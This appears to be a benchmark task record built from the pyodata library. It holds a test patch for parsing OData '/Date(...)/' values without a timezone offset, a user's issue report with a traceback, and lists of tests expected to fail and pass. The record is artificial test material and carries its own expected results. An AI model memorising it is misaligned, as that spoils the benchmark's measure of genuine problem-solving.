assert str(e_info.value).startswith('Cannot decode datetimeoffset from value xyz')
-def test_traits_datetimeoffset_from_odata(type_date_time_offset):
+def test_traits_datetimeoffset_from_json(type_date_time_offset):
"""Test Edm.DateTimeOffset trait: OData -> Python"""
# parsing full representation
@@ -768,6 +771,14 @@ def test_traits_datetimeoffset_from_odata(type_date_time_offset):
assert testdate.microsecond == 0
assert testdate.tzinfo == timezone(-timedelta(minutes=5))
+ # parsing special edge case with no offset provided, defaults to UTC
+ testdate = type_date_time_offset.traits.from_json("/Date(217567986000)/")
+ assert testdate.year == 1976
+ assert testdate.minute == 33
+ assert testdate.second == 6
+ assert testdate.microsecond == 0
+ assert testdate.tzinfo == timezone.utc
+
# parsing below lowest value with workaround
pyodata.v2.model.FIX_SCREWED_UP_MINIMAL_DATETIME_VALUE = True
testdate = type_date_time_offset.traits.from_json("/Date(-62135596800001+0001)/")
|
Malformed value for primitive Edm.DateTimeOffset type
We are using pyodata v1.7.1 the whole time and I'm tried to update to the latest v1.10.0 version. But now I get this error when querying data from the odata service:
```
Traceback (most recent call last):
File "/workspace/tmp/venv/odatavenv/lib/python3.10/site-packages/pyodata/v2/model.py", line 534, in from_json
milliseconds_since_epoch = matches.group('milliseconds_since_epoch')
AttributeError: 'NoneType' object has no attribute 'group'
During handling of the above exception, another exception occurred:
Traceback (most recent call last):
File "/workspace/tmp/venv/odatavenv/lib/python3.10/site-packages/prefect/engine.py", line 1192, in orchestrate_task_run
result = await run_sync(task.fn, *args, **kwargs)
File "/workspace/tmp/venv/odatavenv/lib/python3.10/site-packages/prefect/utilities/asyncutils.py", line 57, in run_sync_in_worker_thread
return await anyio.to_thread.run_sync(call, cancellable=True)
File "/workspace/tmp/venv/odatavenv/lib/python3.10/site-packages/anyio/to_thread.py", line 31, in run_sync
return await get_asynclib().run_sync_in_worker_thread(
File "/workspace/tmp/venv/odatavenv/lib/python3.10/site-packages/anyio/_backends/_asyncio.py", line 937, in run_sync_in_worker_thread
return await future
File "/workspace/tmp/venv/odatavenv/lib/python3.10/site-packages/anyio/_backends/_asyncio.py", line 867, in run
result = context.run(func, *args)
File "/workspace/odatavenv/flow_utilities/prefect/tasks/odata.py", line 60, in fetch_odata
for cnt, batch in enumerate(batches, start=1):
File "/workspace/odatavenv/flow_utilities/api/odata.py", line 114, in query_all
yield list(self.query(skip, top))
File "/workspace/odatavenv/flow_utilities/api/odata.py", line 98, in query
response = self._entity_service().skip(skip).top(top).execute()
File "/workspace/tmp/venv/odatavenv/lib/python3.10/site-packages/pyodata/v2/service.py", line 349, in execute
return self._call_handler(response)
File "/workspace/tmp/venv/odatavenv/lib/python3.10/site-packages/pyodata/v2/service.py", line 362, in _call_handler
return self._handler(response)
File "/workspace/tmp/venv/odatavenv/lib/python3.10/site-packages/pyodata/v2/service.py", line 1509, in get_entities_handler
entity = EntityProxy(self._service, self._entity_set, self._entity_set.entity_type, props)
File "/workspace/tmp/venv/odatavenv/lib/python3.10/site-packages/pyodata/v2/service.py", line 814, in __init__
self._cache[type_proprty.name] = type_proprty.from_json(proprties[type_proprty.name])
File "/workspace/tmp/venv/odatavenv/lib/python3.10/site-packages/pyodata/v2/model.py", line 872, in from_json
return self.typ.traits.from_json(value)
File "/workspace/tmp/venv/odatavenv/lib/python3.10/site-packages/pyodata/v2/model.py", line 537, in from_json
raise PyODataModelError(
pyodata.exceptions.PyODataModelError: Malformed value /Date(1599659339088)/ for primitive Edm.DateTimeOffset type. Expected format is /Date(<ticks>±<offset>)/
```
Maybe this is related to our instance because they are uncompatible dates (see https://github.com/SAP/python-pyodata/issues/143).
|
0.0
|
5d1490871f4b824a82dd6eaa148444a99ea4f47d
|
[
"tests/test_model_v2.py::test_traits_datetimeoffset_from_json"
] |
[
"tests/test_model_v2.py::test_edmx",
"tests/test_model_v2.py::test_schema_entity_type_nullable",
"tests/test_model_v2.py::test_schema_entity_type_fixed_length[Name-False-Name",
"tests/test_model_v2.py::test_schema_entity_type_fixed_length[ID-True-Customer",
"tests/test_model_v2.py::test_schema_entity_type_fixed_length[City-False-City",
"tests/test_model_v2.py::test_schema_entity_sets",
"tests/test_model_v2.py::test_edmx_associations",
"tests/test_model_v2.py::test_edmx_navigation_properties",
"tests/test_model_v2.py::test_edmx_function_imports",
"tests/test_model_v2.py::test_edmx_complex_types",
"tests/test_model_v2.py::test_edmx_complex_type_prop_vh",
"tests/test_model_v2.py::test_traits",
"tests/test_model_v2.py::test_parse_datetime_literal[2001-02-03T04:05:06.000007-expected0]",
"tests/test_model_v2.py::test_parse_datetime_literal[2001-02-03T04:05:06-expected1]",
"tests/test_model_v2.py::test_parse_datetime_literal[2001-02-03T04:05-expected2]",
"tests/test_model_v2.py::test_parse_datetime_literal_faulty[2001-02-03T04:05:61]",
"tests/test_model_v2.py::test_parse_datetime_literal_faulty[2001-02-03T04:61]",
"tests/test_model_v2.py::test_parse_datetime_literal_faulty[2001-02-03T24:05]",
"tests/test_model_v2.py::test_parse_datetime_literal_faulty[2001-02-32T04:05]",
"tests/test_model_v2.py::test_parse_datetime_literal_faulty[2001-13-03T04:05]",
"tests/test_model_v2.py::test_parse_datetime_literal_faulty[2001-00-03T04:05]",
"tests/test_model_v2.py::test_parse_datetime_literal_faulty[01-02-03T04:05]",
"tests/test_model_v2.py::test_parse_datetime_literal_faulty[2001-02-03T04:05.AAA]",
"tests/test_model_v2.py::test_parse_datetime_literal_faulty[]",
"tests/test_model_v2.py::test_traits_datetime",
"tests/test_model_v2.py::test_traits_datetime_with_offset_from_json",
"tests/test_model_v2.py::test_traits_datetime_with_offset_to_json[python_datetime0-/Date(217567986123)/-With",
"tests/test_model_v2.py::test_traits_datetime_with_offset_to_json[python_datetime1-/Date(217567986000)/-No",
"tests/test_model_v2.py::test_traits_datetimeoffset",
"tests/test_model_v2.py::test_traits_datetimeoffset_to_literal",
"tests/test_model_v2.py::test_traits_invalid_datetimeoffset_to_literal",
"tests/test_model_v2.py::test_traits_datetimeoffset_to_json[python_datetime0-/Date(217567986123+0000)/-UTC]",
"tests/test_model_v2.py::test_traits_datetimeoffset_to_json[python_datetime1-/Date(217567986000+0840)/-+14",
"tests/test_model_v2.py::test_traits_datetimeoffset_to_json[python_datetime2-/Date(217567986000-0720)/--12",
"tests/test_model_v2.py::test_traits_datetimeoffset_from_literal[datetimeoffset'1976-11-23T03:33:06.654321+12:11'-expected0-Full",
"tests/test_model_v2.py::test_traits_datetimeoffset_from_literal[datetimeoffset'1976-11-23T03:33:06+12:11'-expected1-No",
"tests/test_model_v2.py::test_traits_datetimeoffset_from_literal[datetimeoffset'1976-11-23T03:33:06-01:00'-expected2-Negative",
"tests/test_model_v2.py::test_traits_datetimeoffset_from_literal[datetimeoffset'1976-11-23t03:33:06-01:00'-expected3-lowercase",
"tests/test_model_v2.py::test_traits_datetimeoffset_from_literal[datetimeoffset'1976-11-23T03:33:06+00:00'-expected4-+00:00",
"tests/test_model_v2.py::test_traits_datetimeoffset_from_literal[datetimeoffset'1976-11-23T03:33:06-00:00'-expected5--00:00",
"tests/test_model_v2.py::test_traits_datetimeoffset_from_literal[datetimeoffset'1976-11-23t03:33:06Z'-expected6-Z",
"tests/test_model_v2.py::test_traits_datetimeoffset_from_literal[datetimeoffset'1976-11-23t03:33:06+12:00'-expected7-On",
"tests/test_model_v2.py::test_traits_datetimeoffset_from_literal[datetimeoffset'1976-11-23t03:33:06-12:00'-expected8-Minimum",
"tests/test_model_v2.py::test_traits_datetimeoffset_from_literal[datetimeoffset'1976-11-23t03:33:06+14:00'-expected9-Maximum",
"tests/test_model_v2.py::test_traits_datetimeoffset_from_invalid_literal",
"tests/test_model_v2.py::test_traits_collections",
"tests/test_model_v2.py::test_type_parsing",
"tests/test_model_v2.py::test_types",
"tests/test_model_v2.py::test_complex_serializer",
"tests/test_model_v2.py::test_annot_v_l_missing_e_s",
"tests/test_model_v2.py::test_annot_v_l_missing_e_t",
"tests/test_model_v2.py::test_annot_v_l_trgt_inv_prop",
"tests/test_model_v2.py::test_namespace_with_periods",
"tests/test_model_v2.py::test_edmx_entity_sets",
"tests/test_model_v2.py::test_config_set_default_error_policy",
"tests/test_model_v2.py::test_null_type",
"tests/test_model_v2.py::test_faulty_association",
"tests/test_model_v2.py::test_faulty_association_set",
"tests/test_model_v2.py::test_missing_association_for_navigation_property",
"tests/test_model_v2.py::test_edmx_association_end_by_role",
"tests/test_model_v2.py::test_edmx_association_set_end_by_role",
"tests/test_model_v2.py::test_edmx_association_set_end_by_entity_set",
"tests/test_model_v2.py::test_missing_data_service",
"tests/test_model_v2.py::test_missing_schema",
"tests/test_model_v2.py::test_namespace_whitelist",
"tests/test_model_v2.py::test_unsupported_edmx_n",
"tests/test_model_v2.py::test_unsupported_schema_n",
"tests/test_model_v2.py::test_whitelisted_edm_namespace",
"tests/test_model_v2.py::test_whitelisted_edm_namespace_2006_04",
"tests/test_model_v2.py::test_whitelisted_edm_namespace_2007_05",
"tests/test_model_v2.py::test_enum_parsing",
"tests/test_model_v2.py::test_unsupported_enum_underlying_type",
"tests/test_model_v2.py::test_enum_value_out_of_range",
"tests/test_model_v2.py::test_missing_property_referenced_in_annotation",
"tests/test_model_v2.py::test_struct_type_has_property_initial_instance",
"tests/test_model_v2.py::test_struct_type_has_property_no",
"tests/test_model_v2.py::test_struct_type_has_property_yes",
"tests/test_model_v2.py::test_invalid_xml"
] |
{
"failed_lite_validators": [
"has_many_modified_files"
],
"has_test_patch": true,
"is_lite": false
}
|
2022-09-23 14:08:18+00:00
|
apache-2.0
| 666
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.